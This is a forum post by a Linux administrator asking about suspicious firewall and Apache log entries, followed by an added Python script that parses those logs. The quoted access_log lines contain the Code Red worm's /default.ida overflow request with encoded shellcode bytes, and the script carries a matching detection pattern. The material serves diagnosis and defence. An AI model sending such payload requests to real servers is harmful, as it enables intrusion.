Hello all, I just set up a new LM8.1 machine to act as an internet connection masquerader for a small LAN along with a web server. This was on Saturday morning.
When I went by to check on it on Monday morning I noticed several unusual entries in /var/log/messages and /var/log/httpd/access_log.

The messages file entries are like the following, and there were a ton of them; I just included a few as samples:

Jan 12 17:16:08 router kernel: auditIN=ppp0 OUT= MAC= SRC=209.58.110.227 DST=204.116.24.143 LEN=40 TOS=0x00 PREC=0x00 TTL=241 ID=64210 PROTO=TCP SPT=21 DPT=21 WINDOW=40 RES=0x00 SYN URGP=0
Jan 12 17:21:20 router kernel: auditIN=ppp0 OUT= MAC= SRC=212.194.119.109 DST=204.116.24.143 LEN=48 TOS=0x00 PREC=0x00 TTL=115 ID=37628 DF PROTO=TCP SPT=1647 DPT=21 WINDOW=16384 RES=0x00 SYN URGP=0
Jan 13 16:04:26 router kernel: auditIN=ppp0 OUT= MAC= SRC=203.69.167.151 DST=204.116.24.143 LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=21029 DF PROTO=TCP SPT=4289 DPT=111 WINDOW=32120 RES=0x00 SYN URGP=0

In /var/log/httpd/access_log I found several entries like the following; again, just a sample has been included:

148.246.25.158 - - [12/Jan/2002:22:19:02 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 347 "-" "-"
141.238.17.66 - - [13/Jan/2002:11:25:35 -0500] "GET /default.ida?NNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u909 u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% 31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 347 "-" "-"
66.82.52.10 - - [13/Jan/2002:16:03:32 -0500] "GET /default.ida?NNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% 858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 347 "-" "-"

Does anyone have any idea what these entries represent? I know the entries from access_log are GET requests, but is someone attempting to break into the system via the web server with them?

Thanks,
Ian K. Harrell
[EMAIL PROTECTED]
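The two log formats in the post can be triaged mechanically. The following is an added example (not from the original poster) that parses the iptables-style "kernel: audit" lines into a per-destination-port list of probing sources (21 is FTP, 111 is the RPC portmapper) and flags access_log requests for /default.ida with a %u-encoded query string, the well-known signature of the Code Red worm probing for Microsoft IIS; the 400 status shows Apache rejected them. The sample log text is constructed from abbreviated copies of the entries quoted above plus one benign request.

```python
import re

# Constructed sample input: abbreviated copies of the entries quoted in the post.
KERNEL_LOG = """\
Jan 12 17:16:08 router kernel: auditIN=ppp0 OUT= MAC= SRC=209.58.110.227 DST=204.116.24.143 LEN=40 TOS=0x00 PREC=0x00 TTL=241 ID=64210 PROTO=TCP SPT=21 DPT=21 WINDOW=40 RES=0x00 SYN URGP=0
Jan 12 17:21:20 router kernel: auditIN=ppp0 OUT= MAC= SRC=212.194.119.109 DST=204.116.24.143 LEN=48 TOS=0x00 PREC=0x00 TTL=115 ID=37628 DF PROTO=TCP SPT=1647 DPT=21 WINDOW=16384 RES=0x00 SYN URGP=0
Jan 13 16:04:26 router kernel: auditIN=ppp0 OUT= MAC= SRC=203.69.167.151 DST=204.116.24.143 LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=21029 DF PROTO=TCP SPT=4289 DPT=111 WINDOW=32120 RES=0x00 SYN URGP=0
"""

# Constructed: one shortened Code Red probe plus one ordinary page fetch.
ACCESS_LOG = """\
148.246.25.158 - - [12/Jan/2002:22:19:02 -0500] "GET /default.ida?NNNNNNNN%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 400 347 "-" "-"
10.0.0.5 - - [13/Jan/2002:09:00:00 -0500] "GET /index.html HTTP/1.0" 200 1532 "-" "Mozilla/4.0"
"""

# Fields of the netfilter LOG target line as written to /var/log/messages.
KERNEL_RE = re.compile(
    r"kernel: audit.*?SRC=(?P<src>\S+) .*?PROTO=(?P<proto>\w+) .*?DPT=(?P<dpt>\d+)"
)
# Apache common/combined log format: client, timestamp, request line, status.
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def summarize_firewall(text):
    """Map each probed destination port to the list of source addresses that hit it."""
    by_port = {}
    for line in text.splitlines():
        m = KERNEL_RE.search(line)
        if m and m.group("proto") == "TCP":
            by_port.setdefault(int(m.group("dpt")), []).append(m.group("src"))
    return by_port


def classify_request(path):
    """Label a request path: Code Red probes ask for /default.ida with %u-encoded bytes."""
    if path.lower().startswith("/default.ida?") and "%u" in path.lower():
        return "code-red-probe"
    return "ok"


def summarize_access(text):
    """Return (client, label, status) for every parsable access_log line."""
    rows = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            rows.append((m.group("src"), classify_request(m.group("path")), int(m.group("status"))))
    return rows
```

A non-2xx status on every /default.ida hit (400 here) is the check that matters: the probe targets an IIS ISAPI filter that Apache does not have, so these entries are worm noise rather than a successful break-in.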